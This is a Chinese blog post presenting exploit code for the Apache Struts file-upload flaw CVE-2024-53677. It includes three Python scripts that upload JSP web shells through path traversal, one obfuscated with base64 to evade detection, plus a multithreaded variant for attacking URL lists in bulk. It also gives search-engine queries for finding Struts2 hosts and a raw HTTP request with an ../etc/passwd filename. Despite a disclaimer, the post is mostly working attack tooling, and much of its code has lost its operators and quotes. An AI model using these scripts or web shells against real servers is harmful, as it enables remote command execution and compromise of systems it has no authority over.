经常投诉网站快照,泰安房地产信息网官网,wordpress查看访问量,网站程序设计软件前言
对目前的Apache Struts RCE (CVE-2024-53677)的poc进行总结#xff0c;由于只能单个ip验证#xff0c;所以自己更改一下代码#xff0c;实现#xff1a;多线程读取url验证并保存#xff0c;更改为中文解释
免责声明
请勿利用文章内的相关技术从事非法测试#xf…前言
对目前的Apache Struts RCE (CVE-2024-53677)的poc进行总结由于只能单个ip验证所以自己更改一下代码实现多线程读取url验证并保存更改为中文解释
免责声明
请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
往期推荐
14wpocnuclei全家桶nuclei模版管理工具Nuclei
哥斯拉二开免杀绕过规避流量检测设备
fscan全家桶FscanPlusfsfscan适用低版本系统FscanParser
自动爬取url地址检测sql注入漏洞sqlmc安装使用
一键转换订阅为代理池工具白嫖思路
TestNet安装使用可以代替灯塔
python实现
参考大佬的pochttps://github.com/TAM-K592/CVE-2024-53677-S2-067/ Apache Struts 的以下版本受到影响2.0.0 至 2.5.336.0.0 至 6.3.0.2
根据poc的最近几天的历史目前网上的最终版本是base64混淆是昨天中文出来的2024.12.18中午 https://github.com/TAM-K592/CVE-2024-53677-S2-067/ 我在大佬的基础上进行了一些修改
变成了多线程解释变成了中文
usage: CVE-2024-53677-S2-067-thread.py [-h] (-u URL | -f FILE) --upload_endpoint UPLOAD_ENDPOINT [--paths PATHS [PATHS ...]][--filenames FILENAMES [FILENAMES ...]] [--payload PAYLOAD] [-s THREADS] [-o OUTPUT]S2-067 Exploit - 多线程文件上传支持并从文件中读取URLoptions:-h, --help show this help message and exit-u URL, --url URL 目标基础URL例如http://example.com-f FILE, --file FILE 包含目标基础URL的文件路径每行一个URL--upload_endpoint UPLOAD_ENDPOINT上传端点路径例如/uploads.action--paths PATHS [PATHS ...]路径遍历测试路径--filenames FILENAMES [FILENAMES ...]自定义载荷文件名--payload PAYLOAD 自定义JSP载荷内容-s THREADS, --threads THREADS使用的线程数量默认: 5-o OUTPUT, --output OUTPUT输出成功URL的文件路径默认success.txt地址https://github.com/dustblessnotdust/CVE-2024-53677-S2-067-thread 源代码在下面
检测文件上传是否上传成功不执行命令
import requests
import argparse
import logging
from urllib.parse import urljoin
from requests_toolbelt.multipart.encoder import MultipartEncoder
import random# Configure logging
logging.basicConfig(levellogging.INFO,format%(asctime)s [%(levelname)s] %(message)s,handlers[logging.StreamHandler()]
)def detect_vulnerability(target_url, upload_endpoint):Non-destructive detection of CVE-2024-53677.logging.info(Starting detection for CVE-2024-53677 (S2-067)...)upload_url urljoin(target_url, upload_endpoint)test_filename ../../vuln_test.txtharmless_content S2-067 detection test.# Attempt to overwrite file name using OGNL bindingfiles {upload: (test.txt, harmless_content, text/plain),top.uploadFileName: test_filename # Attempt filename overwrite}# Custom Content-Type boundaryboundary ----WebKitFormBoundary .join(random.choices(abcdefghijklmnopqrstuvwxyz0123456789, k16))m MultipartEncoder(fieldsfiles, boundaryboundary)headers {User-Agent: Mozilla/5.0,Content-Type: m.content_type}logging.info(fSending test request to upload endpoint: {upload_url})try:# Send file upload requestresponse requests.post(upload_url, headersheaders, datam, timeout10)# Analyze HTTP responseif response.status_code 200:logging.info([INFO] File upload request succeeded.)if vuln_test.txt in response.text:logging.warning([ALERT] File name overwrite detected. Target may be vulnerable!)else:logging.info([INFO] Target does not appear vulnerable.)elif response.status_code in [403, 401]:logging.info([INFO] Access denied. Ensure proper permissions.)else:logging.info(f[INFO] Unexpected HTTP response: {response.status_code})except requests.exceptions.RequestException as e:logging.error(f[ERROR] Request failed: {e})def main():parser argparse.ArgumentParser(descriptionCVE-2024-53677 (S2-067) Non-destructive Detection Tool)parser.add_argument(-u, --url, requiredTrue, helpTarget base URL (e.g., http://example.com))parser.add_argument(--upload_endpoint, requiredTrue, helpPath to file upload endpoint (e.g., /upload.action))args parser.parse_args()logging.info(Starting detection process...)detect_vulnerability(args.url, args.upload_endpoint)logging.info(Detection process completed.)if __name__ __main__:main()没有进行base64混淆
import requests
import argparse
from urllib.parse import urljoin
from requests_toolbelt.multipart.encoder import MultipartEncoder
import random
import stringdef generate_random_filename(extension.jsp, length8):Generate a random filename.return .join(random.choices(string.ascii_letters string.digits, klength)) extensiondef create_payload():Generate a simple JSP payload for testing RCE.return % page importjava.io.* %
%String cmd request.getParameter(cmd);if (cmd ! null) {Process p Runtime.getRuntime().exec(cmd);BufferedReader in new BufferedReader(new InputStreamReader(p.getInputStream()));String line;while ((line in.readLine()) ! null) {out.println(line);}}
%def upload_multiple_files(target_url, upload_endpoint, payload, paths, filenames):Upload multiple payload files using parameter overwrite and path traversal.upload_url urljoin(target_url, upload_endpoint)print(f[INFO] Target upload endpoint: {upload_url})headers {User-Agent: Mozilla/5.0}boundary ----WebKitFormBoundary .join(random.choices(string.ascii_letters string.digits, k16))for path in paths:files_payload {}print(f\n[INFO] Testing path traversal with base path: {path})for index, filename in enumerate(filenames):modified_filename f{path}/{filename}key_file fupload[{index}]key_name fuploadFileName[{index}]files_payload[key_file] (filename, payload, application/octet-stream)files_payload[key_name] modified_filenameprint(f[INFO] File {index 1}: {modified_filename})m MultipartEncoder(fieldsfiles_payload, boundaryboundary)headers[Content-Type] m.content_typetry:response requests.post(upload_url, headersheaders, datam, timeout10)if response.status_code 200:print([SUCCESS] Payload uploaded. Verifying...)for filename in filenames:verify_uploaded_file(target_url, f{path}/{filename})else:print(f[ERROR] Upload failed. HTTP {response.status_code})except requests.RequestException as e:print(f[ERROR] Request failed: {e})def verify_uploaded_file(target_url, file_path):Verify if the uploaded payload file is accessible and can execute commands.file_url urljoin(target_url, file_path)print(f[INFO] Verifying uploaded file: {file_url})try:response requests.get(file_url, timeout10)if response.status_code 200:print(f[ALERT] File uploaded and accessible: {file_url}?cmdwhoami)else:print(f[INFO] File not accessible. HTTP Status: {response.status_code})except requests.RequestException as e:print(f[ERROR] Verification failed: {e})def main():parser argparse.ArgumentParser(descriptionS2-067 Exploit - Multi-file Upload Support)parser.add_argument(-u, --url, requiredTrue, helpTarget base URL (e.g., http://example.com))parser.add_argument(--upload_endpoint, requiredTrue, helpPath to upload endpoint (e.g., /uploads.action))parser.add_argument(--paths, nargs, default[../../../../../webapps/ROOT, /tmp],helpPaths for path traversal testing)parser.add_argument(--filenames, nargs,helpCustom filenames for payloads,default[generate_random_filename() for _ in range(3)])parser.add_argument(--payload, helpCustom JSP payload content, defaultcreate_payload())args parser.parse_args()print([INFO] Starting S2-067 Multi-file Upload Exploit...)upload_multiple_files(args.url.rstrip(/), args.upload_endpoint, args.payload, args.paths, args.filenames)print(\n[INFO] Exploit process completed.)if __name__ __main__:main()进行了base64混淆
import requests
import argparse
import base64
import random
import string
from urllib.parse import urljoin
from requests_toolbelt.multipart.encoder import MultipartEncoderdef generate_random_filename(extension.jsp, length8):Generate a random filename.return .join(random.choices(string.ascii_letters string.digits, klength)) extensiondef create_obfuscated_payload():Generate an obfuscated JSP payload for testing RCE.Avoid direct detection by encoding and decoding commands dynamically.payload_base64 base64.b64encode(
% page importjava.io.* %
%String cmd request.getParameter(cmd);if (cmd ! null) {Process p Runtime.getRuntime().exec(cmd);BufferedReader in new BufferedReader(new InputStreamReader(p.getInputStream()));StringBuilder output new StringBuilder();String line;while ((line in.readLine()) ! null) {output.append(line).append(\\n);}out.println(output.toString());}
%
.strip().encode()).decode()jsp_payload f% page importjava.util.Base64, java.nio.charset.StandardCharsets %
%String encodedPayload {payload_base64};byte[] decodedBytes Base64.getDecoder().decode(encodedPayload);String decoded new String(decodedBytes, StandardCharsets.UTF_8);out.println(decoded);// Execute dynamically decoded payloadrequest.getRequestDispatcher(temp.jsp).include(request, response);
%return jsp_payloaddef upload_multiple_files(target_url, upload_endpoint, payload, paths, filenames):Upload multiple payload files using parameter overwrite and path traversal.upload_url urljoin(target_url, upload_endpoint)print(f[INFO] Target upload endpoint: {upload_url})headers {User-Agent: Mozilla/5.0}boundary ----WebKitFormBoundary .join(random.choices(string.ascii_letters string.digits, k16))for path in paths:files_payload {}print(f\n[INFO] Testing path traversal with base path: {path})for index, filename in enumerate(filenames):modified_filename f{path}/{filename}key_file fupload[{index}]key_name fuploadFileName[{index}]files_payload[key_file] (filename, payload, application/octet-stream)files_payload[key_name] modified_filenameprint(f[INFO] File {index 1}: {modified_filename})m MultipartEncoder(fieldsfiles_payload, boundaryboundary)headers[Content-Type] m.content_typetry:response requests.post(upload_url, headersheaders, datam, timeout10)if response.status_code 200:print([SUCCESS] Payload uploaded. Verifying...)for filename in filenames:verify_uploaded_file(target_url, f{path}/{filename})else:print(f[ERROR] Upload failed. HTTP {response.status_code})except requests.RequestException as e:print(f[ERROR] Request failed: {e})def verify_uploaded_file(target_url, file_path):Verify if the uploaded payload file is accessible.file_url urljoin(target_url, file_path)print(f[INFO] Verifying uploaded file: {file_url})try:response requests.get(file_url, timeout10)if response.status_code 200:print(f[ALERT] File uploaded and accessible: {file_url}?cmdwhoami)else:print(f[INFO] File not accessible. HTTP Status: {response.status_code})except requests.RequestException as e:print(f[ERROR] Verification failed: {e})def main():parser argparse.ArgumentParser(descriptionS2-067 Exploit - Multi-file Upload Support)parser.add_argument(-u, --url, requiredTrue, helpTarget base URL (e.g., http://example.com))parser.add_argument(--upload_endpoint, requiredTrue, helpPath to upload endpoint (e.g., /uploads.action))parser.add_argument(--paths, nargs, default[../../../../../webapps/ROOT, /tmp],helpPaths for path traversal testing)parser.add_argument(--filenames, nargs,helpCustom filenames for payloads,default[generate_random_filename() for _ in range(3)])parser.add_argument(--payload, helpCustom JSP payload content, defaultcreate_obfuscated_payload())args parser.parse_args()print([INFO] Starting S2-067 Multi-file Upload Exploit...)upload_multiple_files(args.url.rstrip(/), args.upload_endpoint, args.payload, args.paths, args.filenames)print(\n[INFO] Exploit process completed.)if __name__ __main__:main()多线程中文
使用截图 代码部分
import requests
import argparse
import base64
import random
import string
from urllib.parse import urljoin
from requests_toolbelt.multipart.encoder import MultipartEncoder
from concurrent.futures import ThreadPoolExecutor def generate_random_filename(extension.jsp, length8): 生成随机文件名。 return .join(random.choices(string.ascii_letters string.digits, klength)) extension def create_obfuscated_payload(): 生成一个用于测试RCE的混淆JSP载荷。 通过动态编码和解码命令以避免直接检测。 payload_base64 base64.b64encode(
% page importjava.io.* %
% String cmd request.getParameter(cmd); if (cmd ! null) { Process p Runtime.getRuntime().exec(cmd); BufferedReader in new BufferedReader(new InputStreamReader(p.getInputStream())); StringBuilder output new StringBuilder(); String line; while ((line in.readLine()) ! null) { output.append(line).append(\\n); } out.println(output.toString()); }%
.strip().encode()).decode() jsp_payload f% page importjava.util.Base64, java.nio.charset.StandardCharsets %
% String encodedPayload {payload_base64}; byte[] decodedBytes Base64.getDecoder().decode(encodedPayload); String decoded new String(decodedBytes, StandardCharsets.UTF_8); out.println(decoded); // 动态执行解码后的载荷 request.getRequestDispatcher(temp.jsp).include(request, response);% return jsp_payload def upload_and_verify_file(upload_url, headers, files_payload, path, filename): m MultipartEncoder(fieldsfiles_payload, boundary----WebKitFormBoundary .join(random.choices(string.ascii_letters string.digits, k16))) headers[Content-Type] m.content_type try: response requests.post(upload_url, headersheaders, datam, timeout10) if response.status_code 200: print([成功] 载荷上传成功。正在验证...) verify_uploaded_file(upload_url.split(/uploads)[0], f{path}/{filename}) else: print(f[错误] 上传失败。HTTP 状态码 {response.status_code} 文件 {filename}) except requests.RequestException as e: print(f[错误] 请求失败: {e}) def verify_uploaded_file(target_url, file_path): 验证上传的载荷文件是否可访问。 file_url urljoin(target_url, file_path) print(f[信息] 正在验证上传文件: {file_url}) try: response requests.get(file_url, timeout10) if response.status_code 200: print(f[警告] 文件上传并可访问: {file_url}?cmdwhoami) else: print(f[信息] 文件不可访问。HTTP 状态码: {response.status_code} 文件 {file_path}) except requests.RequestException as e: print(f[错误] 验证失败: {e}) def read_urls_from_file(file_path): 从文件中读取URL每行一个。 urls [] try: with open(file_path, r) as file: for line in file: url line.strip() if url: urls.append(url) except FileNotFoundError: print(f[错误] 文件未找到: {file_path}) except Exception as e: print(f[错误] 读取文件时出错: {e}) return urls def main(): parser argparse.ArgumentParser(descriptionS2-067 Exploit - 多线程文件上传支持并从文件中读取URL) group parser.add_mutually_exclusive_group(requiredTrue) group.add_argument(-u, --url, help目标基础URL例如http://example.com) group.add_argument(-f, --file, help包含目标基础URL的文件路径每行一个URL) parser.add_argument(--upload_endpoint, requiredTrue, help上传端点路径例如/uploads.action) parser.add_argument(--paths, nargs, default[../../../../../webapps/ROOT, /tmp], help路径遍历测试路径) parser.add_argument(--filenames, nargs, help自定义载荷文件名, default[generate_random_filename() for _ in range(3)]) parser.add_argument(--payload, help自定义JSP载荷内容, defaultcreate_obfuscated_payload()) parser.add_argument(-s, --threads, typeint, default5, help使用的线程数量默认: 5) args parser.parse_args() headers {User-Agent: Mozilla/5.0} if args.file: urls read_urls_from_file(args.file) if not urls: print([错误] 指定文件中没有有效的URL。) return else: urls [args.url.rstrip(/)] for target_url in urls: print(f\n[信息] 正在处理目标URL: {target_url}) upload_url urljoin(target_url, args.upload_endpoint) with ThreadPoolExecutor(max_workersargs.threads) as executor: futures [] for path in args.paths: files_payload {} print(f\n[信息] 使用基路径进行路径遍历测试: {path}) for index, filename in enumerate(args.filenames): modified_filename f{path}/{filename} key_file fupload[{index}] key_name fuploadFileName[{index}] files_payload[key_file] (filename, args.payload, application/octet-stream) files_payload[key_name] modified_filename print(f[信息] 文件 {index 1}: {modified_filename}) future executor.submit(upload_and_verify_file, upload_url, headers.copy(), files_payload, path, filename) futures.append(future) for future in futures: future.result() print(\n[信息] 攻击过程完成。) if __name__ __main__: main()漏洞poc
如果不想使用Python只想验证是否存在可以使用burpsuite或者yakit
Fofa语法
appStruts2quake语法
app:Apache Struts2个人中心输入邀请码“1CWUGm”你我均可获得5,000长效积分哦地址 quake.360.net
poc
POST /upload HTTP/1.1
Host: {{file:line(C:\Users\lenovo\Desktop\漏洞挖掘\数据处理\output_1.txt)}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Content-Length: 220
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q0.9
Cache-Control: max-age0
Connection: close
Content-Type: multipart/form-data; boundary----WebKitFormBoundaryXToNPRY2YGK82Cfc
Upgrade-Insecure-Requests: 1------WebKitFormBoundaryXToNPRY2YGK82Cfc
Content-Disposition: form-data; namefile; filename../../../../../../../etc/passwd
Content-Type: application/octet-stream1
------WebKitFormBoundaryXToNPRY2YGK82Cfc--验证截图
